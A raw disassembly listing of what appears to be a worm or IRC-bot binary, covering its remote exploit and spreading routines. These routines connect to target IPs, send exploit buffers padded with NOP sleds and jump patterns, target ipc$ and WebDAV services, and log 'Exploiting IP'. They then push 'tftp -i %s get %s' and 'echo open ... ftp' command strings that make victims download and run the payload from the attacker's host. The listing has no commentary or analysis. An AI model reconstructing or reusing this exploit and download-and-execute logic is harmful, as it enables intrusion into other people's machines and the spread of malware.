imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_210]
push 200h
push eax
call sub_41466D
add esp, 14h
cmp [ebp+arg_138], edi
jnz short loc_4128DE
push edi
push [ebp+arg_134]
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+arg_98]
push eax
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_4128DE: ; CODE XREF: sub_4125E5+2D7�j
lea eax, [ebp+var_210]
push eax
call sub_401EFF
mov eax, [ebp+arg_12C]
imul eax, 3Ch
lea eax, dword_42B070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_4128FF: ; CODE XREF: sub_4125E5+95�j
pop edi
pop esi
pop ebx
leave
retn
sub_4125E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412904 proc near ; CODE XREF: sub_412998+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_412925
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_412925: ; CODE XREF: sub_412904+19�j
push ebx
push esi
loc_412927: ; CODE XREF: sub_412904+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_412935
cmp [ebp+var_4], eax
jnz short loc_41297D
loc_412935: ; CODE XREF: sub_412904+2A�j
test edi, edi
jnz short loc_412972
cmp bl, 2Dh
jnz short loc_412966
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_412966
cmp al, 5Dh
jz short loc_412966
cmp [ebp+var_4], edi
jnz short loc_412966
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_412972
cmp bl, al
jg short loc_412972
mov [edx], esi
jmp short loc_41296F
; ---------------------------------------------------------------------------
loc_412966: ; CODE XREF: sub_412904+38�j
; sub_412904+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_412972
loc_41296F: ; CODE XREF: sub_412904+60�j
xor edi, edi
inc edi
loc_412972: ; CODE XREF: sub_412904+33�j
; sub_412904+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_412927
; ---------------------------------------------------------------------------
loc_41297D: ; CODE XREF: sub_412904+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_41298A
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_41298A: ; CODE XREF: sub_412904+7E�j
cmp edi, eax
jnz short loc_412993
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_412993: ; CODE XREF: sub_412904+88�j
mov eax, edi
pop edi
leave
retn
sub_412904 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412998 proc near ; CODE XREF: sub_4089DC+5BAC�p
; sub_412A2C+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_4129FA
; ---------------------------------------------------------------------------
loc_4129A4: ; CODE XREF: sub_412998+66�j
cmp eax, 1
jnz short loc_412A0B
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_412A0B
cmp cl, 2Ah
jz short loc_4129E3
cmp cl, 3Fh
jz short loc_4129C8
cmp cl, 5Bh
jz short loc_4129CD
xor eax, eax
cmp cl, dl
setz al
loc_4129C8: ; CODE XREF: sub_412998+22�j
inc [ebp+arg_4]
jmp short loc_4129F6
; ---------------------------------------------------------------------------
loc_4129CD: ; CODE XREF: sub_412998+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_412904
mov esi, [ebp+arg_0]
jmp short loc_4129F4
; ---------------------------------------------------------------------------
loc_4129E3: ; CODE XREF: sub_412998+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_412A2C
mov esi, [ebp+arg_0]
dec esi
loc_4129F4: ; CODE XREF: sub_412998+49�j
pop ecx
pop ecx
loc_4129F6: ; CODE XREF: sub_412998+33�j
inc esi
mov [ebp+arg_0], esi
loc_4129FA: ; CODE XREF: sub_412998+A�j
mov cl, [esi]
test cl, cl
jnz short loc_4129A4
jmp short loc_412A0B
; ---------------------------------------------------------------------------
loc_412A02: ; CODE XREF: sub_412998+76�j
cmp eax, 1
jnz short loc_412A27
inc esi
mov [ebp+arg_0], esi
loc_412A0B: ; CODE XREF: sub_412998+F�j
; sub_412998+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_412A02
cmp eax, 1
jnz short loc_412A27
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_412A27
cmp byte ptr [esi], 0
jnz short loc_412A27
xor eax, eax
inc eax
jmp short loc_412A29
; ---------------------------------------------------------------------------
loc_412A27: ; CODE XREF: sub_412998+6D�j
; sub_412998+7B�j ...
xor eax, eax
loc_412A29: ; CODE XREF: sub_412998+8D�j
pop esi
pop ebp
retn
sub_412998 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A2C proc near ; CODE XREF: sub_412998+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_412A5B
; ---------------------------------------------------------------------------
loc_412A46: ; CODE XREF: sub_412A2C+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_412A57
cmp cl, 2Ah
jnz short loc_412A63
cmp cl, 3Fh
jnz short loc_412A59
loc_412A57: ; CODE XREF: sub_412A2C+1F�j
inc dword ptr [edi]
loc_412A59: ; CODE XREF: sub_412A2C+29�j
inc dword ptr [esi]
loc_412A5B: ; CODE XREF: sub_412A2C+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_412A46
loc_412A63: ; CODE XREF: sub_412A2C+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_412A72
loc_412A68: ; CODE XREF: sub_412A2C+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_412A68
loc_412A72: ; CODE XREF: sub_412A2C+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_412A8F
cmp [eax], bl
jz short loc_412A82
xor eax, eax
jmp short loc_412AF4
; ---------------------------------------------------------------------------
loc_412A82: ; CODE XREF: sub_412A2C+50�j
cmp dl, bl
jnz short loc_412A8F
cmp [eax], bl
jnz short loc_412A8F
xor eax, eax
inc eax
jmp short loc_412AF4
; ---------------------------------------------------------------------------
loc_412A8F: ; CODE XREF: sub_412A2C+4C�j
; sub_412A2C+58�j ...
push ecx
push eax
call sub_412998
test eax, eax
pop ecx
pop ecx
jnz short loc_412ADE
loc_412A9C: ; CODE XREF: sub_412A2C+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_412AC0
loc_412AA8: ; CODE XREF: sub_412A2C+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_412AC0
cmp [eax], bl
jz short loc_412AD5
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_412AA8
loc_412AC0: ; CODE XREF: sub_412A2C+7A�j
; sub_412A2C+81�j
cmp [eax], bl
jz short loc_412AD5
push eax
push dword ptr [esi]
call sub_412998
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_412ADA
; ---------------------------------------------------------------------------
loc_412AD5: ; CODE XREF: sub_412A2C+85�j
; sub_412A2C+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_412ADA: ; CODE XREF: sub_412A2C+A7�j
cmp eax, ebx
jnz short loc_412A9C
loc_412ADE: ; CODE XREF: sub_412A2C+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_412AF1
mov eax, [esi]
cmp [eax], bl
jnz short loc_412AF1
mov [ebp+var_4], 1
loc_412AF1: ; CODE XREF: sub_412A2C+B6�j
; sub_412A2C+BC�j
mov eax, [ebp+var_4]
loc_412AF4: ; CODE XREF: sub_412A2C+54�j
; sub_412A2C+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_412A2C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 3D4h
and dword ptr [ebp-10h], 0
push ebx
push esi
push edi
mov esi, offset dword_428AC0
lea edi, [ebp-24h]
movsd
movsd
movsd
movsd
push 15Bh
movsw
mov dword ptr [ebp-44h], 6741A1CDh
mov dword ptr [ebp-40h], 6741A199h
mov dword ptr [ebp-3Ch], 6741A426h
mov dword ptr [ebp-38h], 67419E1Dh
mov dword ptr [ebp-34h], 67419CE8h
mov dword ptr [ebp-30h], 0FFB7DE9h
mov dword ptr [ebp-2Ch], 0FFB832Fh
call sub_414CAD
pop ecx
mov edi, eax
mov [ebp-4], edi
push 56h
xor eax, eax
pop ecx
rep stosd
stosw
stosb
mov ecx, [ebp-4]
mov edi, ecx
lea esi, [ebp-24h]
movsd
movsd
movsd
movsd
add ecx, 11h
movsw
mov edi, ecx
mov [ebp-28h], ecx
dec edi
loc_412B79: ; CODE XREF: .text:00412B7F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412B79
mov esi, offset loc_428ABC
movsw
movsb
mov edi, ecx
dec edi
loc_412B8C: ; CODE XREF: .text:00412B92�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412B8C
mov esi, offset aNilsisgay ; "NILSISGAY!!"
movsd
push 6
movsd
push 1
push 2
movsd
call dword_435808 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_412DD6
and dword ptr [ebp-8], 0
lea esi, [ebp-44h]
mov [ebp-0Ch], esi
loc_412BBD: ; CODE XREF: .text:00412D61�j
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43587C ; inet_addr
push dword ptr [ebp+12Ch]
mov [ebp-20h], eax
call dword_435954 ; htons
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_412D4D
mov edi, [ebp-28h]
not dword ptr [esi]
push 4
push esi
push edi
call sub_4142E0
mov eax, offset loc_42B248
add esp, 0Ch
mov ecx, eax
loc_412C17: ; CODE XREF: .text:00412C1C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412C17
sub eax, ecx
mov esi, ecx
dec edi
loc_412C23: ; CODE XREF: .text:00412C29�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_412C23
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-4]
rep movsb
lea ecx, [eax+1]
loc_412C3F: ; CODE XREF: .text:00412C44�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412C3F
push 0
sub eax, ecx
push eax
lea eax, [ebp-4]
push eax
push ebx
call dword_43589C ; send
test eax, eax
jz loc_412D4A
mov esi, ds:dword_420000
push 3E8h
call esi ; Sleep
push ebx
call dword_435914 ; closesocket
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43587C ; inet_addr
push 7BDh
mov [ebp-20h], eax
call dword_435954 ; htons
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_4357C0 ; connect
test eax, eax
jz loc_412D4A
mov eax, offset byte_42BF4C
push eax
push eax
push dword ptr [ebp+8]
call sub_407D15
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
mov edi, 190h
lea eax, [ebp-1D4h]
push edi
push eax
call sub_41466D
add esp, 18h
push dword_43535C
push dword ptr [ebp+8]
call sub_407D15
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1D4h]
push edi
push eax
call sub_41466D
add esp, 14h
push 0
add edi, 70h
push edi
lea eax, [ebp-3D4h]
push eax
push dword ptr [ebp+8]
call dword_43577C ; recv
test eax, eax
jle short loc_412D4A
push 1F4h
call esi ; Sleep
lea eax, [ebp-1D4h]
lea edx, [eax+1]
loc_412D2C: ; CODE XREF: .text:00412D31�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412D2C
push 0
sub eax, edx
push eax
lea eax, [ebp-1D4h]
push eax
push ebx
call dword_43589C ; send
test eax, eax
jg short loc_412D69
loc_412D4A: ; CODE XREF: .text:00412C58�j
; .text:00412CAC�j ...
mov esi, [ebp-0Ch]
loc_412D4D: ; CODE XREF: .text:00412BF9�j
push ebx
call dword_435914 ; closesocket
inc dword ptr [ebp-8]
add esi, 4
cmp dword ptr [ebp-8], 7
mov [ebp-0Ch], esi
jb loc_412BBD
jmp short loc_412DD6
; ---------------------------------------------------------------------------
loc_412D69: ; CODE XREF: .text:00412D48�j
push ebx
call dword_435914 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-3D4h]
push edi
push eax
mov dword ptr [ebp-10h], 1
call sub_41466D
add esp, 14h
cmp dword ptr [ebp+140h], 0
jnz short loc_412DC9
push 0
push dword ptr [ebp+13Ch]
lea eax, [ebp-3D4h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056BF
add esp, 14h
loc_412DC9: ; CODE XREF: .text:00412DA6�j
lea eax, [ebp-3D4h]
push eax
call sub_401EFF
pop ecx
loc_412DD6: ; CODE XREF: .text:00412BAD�j
; .text:00412D67�j
mov eax, [ebp-10h]
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412DDE proc near ; CODE XREF: sub_412F21+3F8�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_14], 2
call dword_43587C ; inet_addr
mov [ebp+var_10], eax
xor eax, eax
mov ax, word_42CE28
push eax
call dword_435954 ; htons
xor ebx, ebx
push ebx
push 1
push 2
mov [ebp+var_12], ax
call dword_435808 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jnz short loc_412E37
xor al, al
jmp loc_412F1C
; ---------------------------------------------------------------------------
loc_412E37: ; CODE XREF: sub_412DDE+50�j
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_412F11
push ebx
mov edi, 400h
push edi
lea eax, [ebp+var_5A4]
push eax
push esi
call dword_43577C ; recv
push [ebp+arg_94]
lea eax, [ebp+arg_14]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
mov esi, 190h
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_41466D
lea eax, [ebp+var_1A4]
add esp, 14h
lea ecx, [eax+1]
loc_412E8F: ; CODE XREF: sub_412DDE+B6�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_412E8F
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz short loc_412F11
push 1F4h
call ds:dword_420000 ; Sleep
push offset byte_42BF4C
push offset aS_5 ; "%s\r\n"
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_41466D
lea eax, [ebp+var_1A4]
add esp, 10h
lea edx, [eax+1]
loc_412EDD: ; CODE XREF: sub_412DDE+104�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_412EDD
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz short loc_412F11
push ebx
push edi
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call dword_43577C ; recv
mov bl, 1
loc_412F11: ; CODE XREF: sub_412DDE+69�j
; sub_412DDE+CF�j ...
push [ebp+var_4]
call dword_435914 ; closesocket
mov al, bl
loc_412F1C: ; CODE XREF: sub_412DDE+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_412DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F21 proc near ; CODE XREF: .text:00413448�p
; .text:0041346A�p
var_81DC = byte ptr -81DCh
var_8174 = byte ptr -8174h
var_6104 = byte ptr -6104h
var_6094 = byte ptr -6094h
var_55D0 = byte ptr -55D0h
var_402C = byte ptr -402Ch
var_402B = byte ptr -402Bh
var_2F98 = byte ptr -2F98h
var_24D4 = byte ptr -24D4h
var_24D3 = byte ptr -24D3h
var_24D0 = byte ptr -24D0h
var_2454 = byte ptr -2454h
var_1C84 = byte ptr -1C84h
var_17D9 = byte ptr -17D9h
var_14EC = byte ptr -14ECh
var_EAC = byte ptr -0EACh
var_8D0 = byte ptr -8D0h
var_830 = byte ptr -830h
var_6C8 = dword ptr -6C8h
var_6B8 = byte ptr -6B8h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_384 = byte ptr -384h
var_124 = dword ptr -124h
var_114 = byte ptr -114h
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_AC = byte ptr -0ACh
var_A9 = byte ptr -0A9h
var_7F = byte ptr -7Fh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_140 = dword ptr 148h
arg_144 = dword ptr 14Ch
push ebp
mov ebp, esp
mov eax, 81DCh
call sub_414630
mov eax, ds:dword_428B6C
push ebx
mov [ebp+var_C], eax
mov eax, ds:dword_428B70
push esi
mov [ebp+var_8], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_34]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
loc_412F4E: ; DATA XREF: .rdata:off_42872C�o
call sub_414415
add esp, 0Ch
xor eax, eax
loc_412F58: ; CODE XREF: sub_412F21+4E�j
mov cl, [ebp+eax+var_34]
and [ebp+eax*2+var_FB], 0
mov [ebp+eax*2+var_FC], cl
inc eax
cmp eax, 28h
jl short loc_412F58
push 18h
pop ecx
mov esi, offset dword_42CA20
lea edi, [ebp+var_AC]
lea eax, [ebp+var_34]
rep movsd
lea edx, [eax+1]
loc_412F87: ; CODE XREF: sub_412F21+6B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412F87
sub eax, edx
mov ecx, eax
lea esi, [ebp+var_FC]
lea edi, [ebp+var_7C]
lea eax, [ebp+var_34]
rep movsw
lea ecx, [eax+1]
loc_412FA4: ; CODE XREF: sub_412F21+88�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412FA4
sub eax, ecx
lea edi, [ebp+eax*2+var_7D]
mov esi, (offset aC_4+3)
movsd
movsd
lea eax, [ebp+var_34]
movsb
lea ecx, [eax+1]
loc_412FBF: ; CODE XREF: sub_412F21+A3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412FBF
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
mov [ebp+var_A9], al
lea eax, [ebp+var_34]
lea ecx, [eax+1]
loc_412FDB: ; CODE XREF: sub_412F21+BF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412FDB
sub eax, ecx
shl al, 1
add al, 9
mov [ebp+var_7F], al
xor eax, eax
mov ax, word_42CE28
push eax
call dword_435954 ; htons
xor eax, 9999h
cmp [ebp+arg_144], 0
mov word_42C718, ax
mov eax, 90909090h
jz loc_4130ED
mov ecx, 36Bh
lea edi, [ebp+var_EAC]
rep stosd
mov eax, [ebp+arg_144]
imul eax, 3Ch
mov edx, dword_42CE68[eax]
mov eax, offset loc_42C668
mov ecx, eax
mov [ebp+var_6C8], edx
lea esi, [ecx+1]
loc_413043: ; CODE XREF: sub_412F21+127�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_413043
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp+var_6B8]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov [ebp+var_394], 6EB06EBh
mov [ebp+var_390], edx
lea esi, [ecx+1]
loc_413077: ; CODE XREF: sub_412F21+15B�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_413077
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_384]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_413098: ; CODE XREF: sub_412F21+193�j
mov cl, [ebp+eax+var_EAC]
and [ebp+eax*2+var_402B], 0
mov [ebp+eax*2+var_402C], cl
inc eax
cmp eax, 0DACh
jl short loc_413098
and [ebp+var_24D4], 0
and [ebp+var_24D3], 0
mov edx, 714h
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_81DC]
rep stosd
stosw
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_6104]
rep stosd
stosw
jmp short loc_413154
; ---------------------------------------------------------------------------
loc_4130ED: ; CODE XREF: sub_412F21+F0�j
mov ecx, 1F4h
lea edi, [ebp+var_8D0]
rep stosd
mov eax, offset loc_42C668
mov ecx, eax
lea esi, [ecx+1]
loc_413104: ; CODE XREF: sub_412F21+1E8�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_413104
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_830]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_C]
rep movsb
lea ecx, [eax+1]
loc_413129: ; CODE XREF: sub_412F21+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413129
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp+var_C]
lea edi, [ebp+var_114]
rep movsd
mov ecx, eax
mov eax, dword_42CE68
and ecx, 3
rep movsb
mov [ebp+var_124], eax
loc_413154: ; CODE XREF: sub_412F21+1CA�j
mov esi, [ebp+arg_140]
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp+var_24D0]
rep stosd
stosb
movsx eax, [ebp+var_1]
push 0
add eax, 4
push eax
lea eax, [ebp+var_AC]
push eax
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_413191
loc_41318A: ; CODE XREF: sub_412F21+29A�j
; sub_412F21+2C1�j ...
xor al, al
jmp loc_413329
; ---------------------------------------------------------------------------
loc_413191: ; CODE XREF: sub_412F21+267�j
push 0
mov ebx, 640h
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43577C ; recv
xor edi, edi
push edi
push 68h
push offset dword_42CA88
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz short loc_41318A
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43577C ; recv
push edi
push 0A0h
push offset dword_42CAF8
push esi
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz short loc_41318A
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43577C ; recv
cmp [ebp+arg_144], edi
jz loc_4132A1
push 1Ah
pop ecx
mov esi, offset dword_42CCB8
lea edi, [ebp+var_81DC]
rep movsd
mov ecx, 6D6h
lea esi, [ebp+var_402C]
lea edi, [ebp+var_8174]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42CD28
lea edi, [ebp+var_6104]
rep movsd
mov ecx, 297h
lea esi, [ebp+var_2F98]
lea edi, [ebp+var_6094]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42CDA0
lea edi, [ebp+var_55D0]
rep movsd
xor esi, esi
push esi
push 10FCh
lea eax, [ebp+var_81DC]
push eax
push [ebp+arg_140]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_41318A
push esi
push ebx
lea eax, [ebp+var_14EC]
push eax
push [ebp+arg_140]
call dword_43577C ; recv
push esi
push 0FDCh
lea eax, [ebp+var_6104]
jmp short loc_4132E8
; ---------------------------------------------------------------------------
loc_4132A1: ; CODE XREF: sub_412F21+2D9�j
push 1Fh
pop ecx
mov esi, offset dword_42CBA0
lea edi, [ebp+var_24D0]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp+var_8D0]
lea edi, [ebp+var_2454]
rep movsd
pop ecx
mov esi, offset off_42CC20
lea edi, [ebp+var_1C84]
push 0
rep movsd
and [ebp+var_17D9], 0
push 0CF8h
lea eax, [ebp+var_24D0]
loc_4132E8: ; CODE XREF: sub_412F21+37E�j
push eax
push [ebp+arg_140]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz loc_41318A
push 12Ch
call ds:dword_420000 ; Sleep
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_412DDE
add esp, 140h
test al, al
setnz al
loc_413329: ; CODE XREF: sub_412F21+26B�j
pop edi
pop esi
pop ebx
leave
retn
sub_412F21 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp-14h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
xor esi, esi
push eax
mov [ebp-4], esi
mov word ptr [ebp-14h], 2
call dword_43587C ; inet_addr
push dword ptr [ebp+12Ch]
mov [ebp-10h], eax
call dword_435954 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_435808 ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jz loc_41342A
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_4357C0 ; connect
cmp eax, edi
jz loc_413423
push esi
push 89h
push offset dword_42C800
push ebx
call dword_43589C ; send
cmp eax, edi
jz short loc_413423
push esi
mov esi, 640h
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43577C ; recv
push 0
push 0A8h
push offset dword_42C890
push ebx
call dword_43589C ; send
cmp eax, edi
jz short loc_413423
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43577C ; recv
push 0
push 0DEh
push offset dword_42C940
push ebx
call dword_43589C ; send
cmp eax, edi
jz short loc_413423
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43577C ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_413435
dec eax
jz short loc_413431
loc_413423: ; CODE XREF: .text:00413393�j
; .text:004133AD�j ...
push ebx
call dword_435914 ; closesocket
loc_41342A: ; CODE XREF: .text:0041337E�j
xor eax, eax
jmp loc_4134F7
; ---------------------------------------------------------------------------
loc_413431: ; CODE XREF: .text:00413421�j
push 0
jmp short loc_413459
; ---------------------------------------------------------------------------
loc_413435: ; CODE XREF: .text:0041341E�j
push 2
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_412F21
add esp, 148h
test al, al
jnz short loc_413479
push 1
loc_413459: ; CODE XREF: .text:00413433�j
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_412F21
add esp, 148h
test al, al
jz short loc_413480
loc_413479: ; CODE XREF: .text:00413455�j
mov dword ptr [ebp-4], 1
loc_413480: ; CODE XREF: .text:00413477�j
push ebx
call dword_435914 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_4134F4
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call sub_41466D
push 0
push dword ptr [ebp+13Ch]
lea eax, [ebp-214h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4056BF
lea eax, [ebp-214h]
push eax
call sub_401EFF
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42B070[eax]
add esp, 2Ch
inc dword ptr [eax]
loc_4134F4: ; CODE XREF: .text:0041348B�j
xor eax, eax
inc eax
loc_4134F7: ; CODE XREF: .text:0041342C�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 8590h
call sub_414630
mov eax, ds:dword_428B6C
push ebx
push esi
mov [ebp-0Ch], eax
mov eax, ds:dword_428B70
push edi
mov [ebp-8], eax
lea eax, [ebp+0Ch]
push 1
push eax
call sub_40398A
test eax, eax
pop ecx
pop ecx
